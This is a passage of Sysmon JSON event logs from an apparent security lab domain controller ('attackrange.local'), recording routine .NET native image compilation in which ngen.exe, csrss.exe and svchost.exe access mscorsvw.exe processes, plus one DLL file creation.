{"EventTime":"2020-08-01 07:02:40","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8652,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:40.779\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4384\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-1390-5F25-0000-00106D021000}\r\nTargetProcessId: 2896\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:40.779","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4384","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-1390-5F25-0000-00106D021000}","TargetProcessId":"2896","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:02:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:40","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8653,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:40.779\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 804\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1390-5F25-0000-00106D021000}\r\nTargetProcessId: 2896\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:40.779","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"804","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1390-5F25-0000-00106D021000}","TargetProcessId":"2896","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:02:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:40","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8654,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:40.779\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1390-5F25-0000-00106D021000}\r\nTargetProcessId: 2896\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:40.779","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1390-5F25-0000-00106D021000}","TargetProcessId":"2896","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:02:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:40","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8655,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:40.841\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4456\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-137E-5F25-0000-0010CB9C0F00}\r\nTargetProcessId: 2544\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:40.841","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4456","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-137E-5F25-0000-0010CB9C0F00}","TargetProcessId":"2544","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:02:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:40","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8656,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:40.841\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 660\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-137E-5F25-0000-0010CB9C0F00}\r\nTargetProcessId: 2544\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:40.841","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"660","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-137E-5F25-0000-0010CB9C0F00}","TargetProcessId":"2544","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:02:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:40","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8657,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:40.841\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-137E-5F25-0000-0010CB9C0F00}\r\nTargetProcessId: 2544\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:40.841","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-137E-5F25-0000-0010CB9C0F00}","TargetProcessId":"2544","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:02:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:41","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":8658,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 07:02:41.060\r\nProcessGuid: {E2A3D6B1-1390-5F25-0000-001066061000}\r\nProcessId: 2544\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\9f0-0\\System.Web.DataVisualization.Design.dll\r\nCreationUtcTime: 2020-08-01 07:02:41.060","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 07:02:41.060","ProcessGuid":"{E2A3D6B1-1390-5F25-0000-001066061000}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\9f0-0\\System.Web.DataVisualization.Design.dll","CreationUtcTime":"2020-08-01 07:02:41.060","EventReceivedTime":"2020-08-01 07:02:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:41","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8659,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:41.091\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4384\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-1391-5F25-0000-0010020B1000}\r\nTargetProcessId: 4720\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:41.091","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4384","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-1391-5F25-0000-0010020B1000}","TargetProcessId":"4720","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:02:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:41","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8660,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:41.091\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 660\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1391-5F25-0000-0010020B1000}\r\nTargetProcessId: 4720\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: 